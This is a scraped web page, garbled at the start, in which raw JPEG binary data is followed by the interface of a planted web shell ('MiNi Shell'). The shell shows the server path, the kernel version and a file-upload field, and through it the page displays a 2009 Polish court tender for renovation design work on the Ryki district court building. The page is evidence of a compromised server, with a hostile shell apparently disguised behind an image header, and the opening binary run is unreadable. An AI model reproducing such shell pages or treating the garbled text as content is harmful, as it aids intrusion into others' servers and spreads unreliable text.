JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/283936-N-2009.html

<p class="kh_header"><b>Lublin: Opracowanie dokumentacji projektowo-kosztorysowej remontu budynku Sądu Rejonowego w Rykach położonego przy ul. Kościuszki 15 z przystosowaniem części pomieszczeń dla Wydziału Ksiąg Wieczystych pracującego w systemie NKW  .</b><br>
<b>Numer ogłoszenia: 283936 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Lublinie , ul. Krakowskie Przedmieście 43, 20-076 Lublin, woj. lubelskie, tel. 081 5359164, faks 081 5359164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.so.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej remontu budynku Sądu Rejonowego w Rykach położonego przy ul. Kościuszki 15 z przystosowaniem części pomieszczeń dla Wydziału Ksiąg Wieczystych pracującego w systemie NKW  ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej remontu budynku Sądu Rejonowego w Rykach położonego przy ul. Kościuszki 15 z przystosowaniem części pomieszczeń dla Wydziału Ksiąg Wieczystych pracującego w systemie NKW , w skład której wchodzą:

- wielobranżowy projekt budowlano-wykonawczy (w 5 egz. w tym BIOZ 5 egz), 
- przedmiary robót ( w 2 egz.) i kosztorysy inwestorskie (w 2 egz.), 
- szczegółowe specyfikacje techniczne wykonania i odbioru robót uwzględniające realizację robót w czynnym budynku (2 egz.),
- kosztorysy ofertowe wykonane metodą uproszczoną ,,ślepe (pozycje w tabeli: lp., podstawę wyceny, opis pozycji, jednostkę miary, ilość, cenę jednostkową i wartość - dwie ostatnie kolumny powinny być czyste tj. przygotowane do wypełnienia przez oferenta) (w 2 egz),
- charakterystyka energetyczna budynku (2 egz.),
- pełnienie nadzoru autorskiego,

Całość dokumentacji projektowo-kosztorysowej Wykonawca przedłoży dodatkowo również na nośniku elektronicznym (dokumentacja w formacie zgodnym z  PDF, specyfikacje w formacie zgodnym z PDF i doc, przedmiary i kosztorysy w formacie zgodnym z  PDF i kompatybilnym z NORMĄ).

Dokumentacja powinna uwzględniać przyszłościową realizację zadania w dwóch etapach:
I  etap  -  utworzenie Wydziały Ksiąg Wieczystych pracującego w systemie NKW,
II etap  -  realizacja pozostałej części robót.
- wyodrębnienie etapów w projekcie, przedmiarach i kosztorysach.

Dokumentacja powinna być wykonana w formie zgodnej z:
  1. Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202 poz. 2072 z późn. zmianami);
2.	Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz. 1133); 
3.	Rozporządzenie Ministra Infrastruktury z dnia 6 listopada 2008 roku w sprawie metodologii obliczania charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej (Dz. U. Nr 201 poz. 1240);
4.	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz. 1389);
5.	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakimi powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75 poz. 690 z późniejszymi zmianami);
6.	 Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz.U. nr 80 poz. 563);
7.	Obowiązującymi przepisami ustawy Prawo budowlane; 
8.	Innymi przepisami obowiązującymi przy sporządzaniu ww. dokumentacji

Zakres projektu obejmuje między innymi:

1.	Zaprojektowanie w budynku pomieszczeń dla Wydziału Ksiąg Wieczystych pracującego w systemie Nowa Księga Wieczysta (NKW) - zgodnie ze Wstępnymi wytycznymi dotyczącymi przygotowania wydziałów ksiąg wieczystych na potrzeby wdrożenia systemu Nowa Księga Wieczysta opracowanymi przez Departament CORS i Informatyzacji Resortu Ministerstwa Sprawiedliwości;
2.	Roboty budowlano-instalacyjne związane z nowym układem ścianek działowych i nową funkcją pomieszczeń; 
3.	Remont archiwum NKW z wykonaniem dodatkowych regałów przesuwnych;
4.	Zaprojektowanie dla nowotworzonego Wydziału NKW sieci teleinformatycznej z niezależnym zasilaniem obwodów komputerowych;
5.	Sieć teleinformatyczna z niezależnym zasilaniem obwodów komputerowych w pozostałej części budynku;
6.	Klimatyzacja serwerowni;
7.	Remont posadzek, ścian i sufitów w pozostałej części budynku;
8.	Przystosowanie budynku do obecnie obowiązujących przepisów;
9.	Remont archiwum sądowego z wykonaniem regałów przesuwnych;
10.	Remont sanitariatów;
11.	Wymiana stolarki okiennej ( z obróbkami blacharskimi) i drzwiowej;
12.	Wymiana instalacji elektrycznych;
13.	Przystosowanie budynku do korzystania przez osoby niepełnosprawne - min. toaleta, pochylnia przy schodach zewn., drzwi zewnętrzne.
14.	Remont (ewentualna wymiana) instalacji c.o.;
15.	Remont instalacji wod.-kan. z montażem zaworu antyskażeniowego;
16.	Zaprojektowanie instalacji wentylacji mechanicznej w wymaganym przedmiotem zamówienia zakresie;
17.	Zaprojektowanie instalacji a sygnalizacji włamania-napadu SWN i kontroli dostępu w wymaganym przedmiotem zamówienia zakresie;
18.	Zaprojektowanie instalacji sygnalizacji pożaru SAP w wymaganym przedmiotem zamówienia zakresie;
19.	Zaprojektowanie  monitoringu TV wewnętrzny w wymaganym przedmiotem zamówienia zakresie;
20.	Udrożnienie przewodów wentylacyjnych;
21.	Zaprojektowanie centrali telefonicznej.
22.	Inne niezbędne do wykonania całości zamówienia.

Zamawiający dopuszcza zwiększenie ww. zakresu projektu o uwagi zgłoszone w trakcie wizji lokalnej oraz o inne zalecenia skierowane do Wykonawcy przed złożeniem ofert.
Powierzchnia netto budynku - 900,63 m2

Wymagane opracowania branżowe:
- architektoniczna w wymaganym przez remont zakresie,
- konstrukcyjna w wymaganym przez remont zakresie (do wykonania w przypadku gdy występuje konieczność wykonania robót konstrukcyjnych),
- sanitarna w wymaganym przez remont zakresie, 
- elektryczna w wymaganym przez remont zakresie z uwzględnieniem instalacji specjalnych (teleinformatyczna, SWN, SAP, kontrola dostępu)
- inne niezbędne do wykonania przedmiotu zamówienia,

       Uwagi: 

1.	Do obowiązków Wykonawcy w ramach realizacji przedmiotu zamówienia należy również pozyskanie wszelkich niezbędnych warunków technicznych, uzgodnień projektu oraz pozyskania mapy do celów projektowych jak również warunków przyłączenia mediów. 
2.	Przedmiary robót, kosztorysy inwestorskie i kosztorysy ofertowe ślepe należy opracować osobno dla robót (we wszystkich branżach) związanych z utworzeniem Wydziału NKW i dla robót związanych z pozostałą częścią budynku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości  5000,00zł. (słownie: pięć tysięcy zł. ) w terminie składania ofert
2.	Zamawiający zaleca składanie gwarancji lub poręczenia wniesienia wadium w formie oryginału. Zamawiający wymaga złożenia oryginału gwarancji lub oryginału poręczenia w zakresie wniesienia wadium tylko w przypadku, gdy do skuteczności obowiązywania - zatrzymania przez zamawiającego wadium jest niezbędna forma oryginału. W innym przypadku wystarczającym jest kopia dokumentu poświadczona (potwierdzona) za zgodność z oryginałem przez osobę-osoby uprawnioną-uprawnione do reprezentowania wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy którzy spełniają warunki określone w art 22 pzp. Ocena dokumentów na zasadzie spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	W celu potwierdzenia warunków udziału w postępowaniu,  o których mowa w art. 22 ustawy i których spełnienia wymaga Zamawiający, Zamawiający żąda oświadczenia o spełnianiu warunków określonych w art. 22 ustawy, według wzoru, stanowiącego załącznik nr 2 do  siwz.
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.

       2)  W celu potwierdzenia warunku, którego spełnienia wymaga Zamawiający że  Wykonawca posiada uprawnienia do wykonania określonej działalności      gospodarczej lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, Zamawiający żąda następujących dokumentów:
Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.

       3) W celu potwierdzenia warunku, którego spełnienia wymaga Zamawiający, że  Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących  dokumentów:
          a) Wykazu wykonanych, a w przypadku świadczeń okresowych  lub ciągłych   również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia 
postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom 
stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat 
wykonania i odbiorców według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz 
oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie 
  	Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie, jeżeli wykaże się wykonaniem minimum 1 dokumentacji projektowo-kosztorysowej na remont budynku użyteczności publicznej* o powierzchni użytkowej min 600 m2.

* budynek użyteczności publicznej należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny (§ 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny  odpowiadać budynki i ich usytuowanie - Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.) 
      b)Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji zawodowych, doświadczenia i wykształceni  niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności. 
Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania 	zamówienia, jeżeli przedstawi w ofercie kandydata-kandydatów na każde nw. stanowisko:
a)   Projektant w branży architektonicznej 
b)   Projektant w branży konstrukcyjno-budowlanej 
c)   Projektant w branży instalacyjnej w zakresie, instalacji i urządzeń    
      elektrycznych i elektroenergetycznych 
d) Projektant w branży instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych 

Wszystkie osoby wymienione w ofercie winny posiadać odpowiednie uprawnienia projektowe bez ograniczeń oraz aktualne zaświadczenia o wpisie na listę członków właściwej Izby Samorządu Zawodowego.
Kopie w/w dokumentów należy dołączyć do oferty.

W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.so.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 11:00, miejsce: Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com